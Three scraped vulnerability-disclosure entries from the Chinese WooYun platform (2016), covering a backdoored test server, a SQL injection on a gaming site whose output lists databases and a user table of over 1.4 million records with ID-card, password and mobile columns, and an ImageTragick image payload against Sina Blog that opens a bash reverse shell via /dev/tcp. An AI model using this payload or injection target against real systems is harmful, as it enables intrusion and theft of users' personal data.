漏洞详情披露状态： 2016-04-26： 细节已通知厂商并且等待厂商处理中2016-04-27： 厂商已经确认，细节仅向厂商公开2016-05-07： 细节向核心白帽子及相关领域专家公开2016-05-17： 细节向普通白帽子公开2016-05-27： 细节向实习白帽子公开2016-06-11： 细节向公众公开简要描述：RT详细说明：命令执行：数据库：内网探测：服务器： 漏洞证明：内网应用(协同办公、OA等)：目录遍历：Redmine:还有很多用户，不一一列举：协同办公：档案管理系统：修复方案： 版权声明：转载请注明来源 milkwort。@乌云漏洞回应厂商回应：危害等级：低漏洞Rank：5确认时间：2016-04-27 13:41厂商回复：由于开发商在测试机上部署的程序留了后门，通过这个后门程序来攻击公司测试网段。这后门可能会导致更深层次安全问题的，日后公司加强对开发商以及网络安全管控；最新状态：暂无

漏洞详情披露状态： 2016-04-23： 细节已通知厂商并且等待厂商处理中2016-04-23： 厂商已经确认，细节仅向厂商公开2016-05-03： 细节向核心白帽子及相关领域专家公开2016-05-13： 细节向普通白帽子公开2016-05-23： 细节向实习白帽子公开2016-06-07： 细节向公众公开简要描述：只求20！详细说明： code 区域http://tuis.papa91.com/?aid=NQZFokcode 区域available databases [27]: [*] binlog [*] cnxy_ad_android [*] cnxy_cdk [*] games_collect [*] information_schema [*] mg_bbs [*] mg_bbs2 [*] mg_bbs3 [*] mg_main_db [*] mg_monitor [*] mg_pap_bbs_bak [*] mg_papa_ad [*] mg_papa_ad_ios [*] mg_papa_ad_v2 [*] mg_sso [*] mysql [*] papa_weixinrec [*] papa_yunying_analysis [*] papa_yunying_analysis2 [*] papa_yunying_analysis20150403 [*] quickbug [*] test [*] ultrax [*] xyandroid [*] xyandroid_bbs [*] xyandroid_cdk [*] xyandroid_user所有交易数据及会员数据一应俱全 140W+code 区域Database: xyandroid_user +------------------------+---------+ | Table | Entries | +------------------------+---------+ | xyandroid_user | 1455770 | | xyandroid_login_log_e | 184446 | | xyandroid_login_log_6 | 176712 | | xyandroid_login_log_4 | 176561 | | xyandroid_login_log_d | 176531 | | xyandroid_login_log_5 | 176438 | | xyandroid_login_log_b | 174540 | | xyandroid_login_log_2 | 172134 | | xyandroid_login_log_1 | 171692 | | xyandroid_login_log_c | 169810 | | xyandroid_login_log_3 | 166866 | | xyandroid_login_log_a | 166180 | | xyandroid_login_log_f | 161147 | | xyandroid_login_log_0 | 156517 | | xyandroid_login_log_9 | 155086 | | xyandroid_login_log_7 | 155079 | | xyandroid_login_log_8 | 154075 | | xyandroid_login_0 | 91670 | | xyandroid_login_e | 91613 | | xyandroid_login_3 | 91252 | | xyandroid_login_f | 91232 | | xyandroid_login_5 | 91205 | | xyandroid_login_d | 91181 | | xyandroid_login_c | 91027 | | xyandroid_login_9 | 91014 | | xyandroid_login_2 | 90977 | | xyandroid_login_1 | 90813 | | xyandroid_login_a | 90777 | | xyandroid_login_6 | 90768 | | xyandroid_login_8 | 90624 | | xyandroid_login_b | 90507 | | xyandroid_login_7 | 90400 | | xyandroid_login_4 | 90397 | | xyandroid_pay_6 | 19438 | | xyandroid_pay_2 | 18954 | | xyandroid_pay_5 | 18881 | | xyandroid_pay_4 | 18824 | | xyandroid_pay_f | 18622 | | xyandroid_pay_0 | 18570 | | xyandroid_pay_c | 18123 | | xyandroid_pay_1 | 18019 | | xyandroid_pay_a | 17871 | | xyandroid_pay_d | 17837 | | xyandroid_pay_7 | 17745 | | xyandroid_pay_b | 17589 | | xyandroid_pay_3 | 17449 | | xyandroid_pay_8 | 16825 | | xyandroid_pay_9 | 16724 | | xyandroid_pay_e | 16399 | | xyandroid_deed_log_7 | 2494 | | xyandroid_deed_log_6 | 2347 | | xyandroid_deed_log_d | 2296 | | xyandroid_deed_log_3 | 2262 | | xyandroid_deed_log_2 | 2223 | | xyandroid_deed_log_5 | 2208 | | xyandroid_deed_log_f | 2157 | | xyandroid_deed_log_9 | 2154 | | xyandroid_deed_log_c | 2152 | | xyandroid_deed_log_4 | 2131 | | xyandroid_deed_log_b | 2080 | | xyandroid_deed_log_a | 2072 | | xyandroid_deed_log_1 | 2038 | | xyandroid_deed_log_e | 1977 | | xyandroid_deed_log_8 | 1949 | | xyandroid_sys_sequence | 1 | +------------------------+---------+code 区域Database: xyandroid_user Table: xyandroid_user [27 columns] +-------------+---------------------+ | Column | Type | +-------------+---------------------+ | active_type | tinyint(1) | | address | varchar(255) | | appid | varchar(50) | | birthday | int(10) unsigned | | cip | char(16) | | ctime | int(10) unsigned | | ctype | varchar(16) | | email | varchar(64) | | equip | varchar(128) | | idcard | char(18) | | macaddr | varchar(64) | | mobile | varchar(20) | | nickname | varchar(64) | | password | varchar(64) | | qqopenid | varchar(64) | | realname | varchar(40) | | safea1 | varchar(256) | | safea2 | varchar(255) | | safeq1 | varchar(4) | | safeq2 | varchar(4) | | sex | tinyint(1) unsigned | | source | varchar(16) | | status | tinyint(1) | | uid | int(10) unsigned | | username | varchar(80) | | wbopenid | varchar(64) | | wxopenid | varchar(64) | +-------------+---------------------+bbs库下的会员数据 如果这两个不是一样的话那么就有280W+ 会员数据了另外一个bbs库下的3W+会员数据 漏洞证明： 修复方案： 版权声明：转载请注明来源 Exploit DB@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：20确认时间：2016-04-23 13:50厂商回复：已经确认并修复最新状态：暂无

漏洞详情披露状态： 2016-05-06： 细节已通知厂商并且等待厂商处理中2016-05-06： 厂商已查看当前漏洞内容,细节仅向厂商公开2016-05-09： 厂商已经主动忽略漏洞，细节向公众公开简要描述：新浪博客命令执行（凑个热闹）详细说明：新浪博客发图片的地方选择图片图片内容为code 区域push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/x.x.x.x/80 0>&1")' pop graphic-context一步一步点到保存成功开始上传shell躺在了vps上 漏洞证明：新浪博客发图片的地方选择图片图片内容为code 区域push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/x.x.x.x/80 0>&1")' pop graphic-context一步一步点到保存成功开始上传shell躺在了vps上 修复方案：google一下版权声明：转载请注明来源 ontheway@乌云漏洞回应厂商回应：危害等级：无影响厂商忽略忽略时间：2016-05-09 10:41厂商回复：已有白帽子报过，故忽略，感谢支持~最新状态：暂无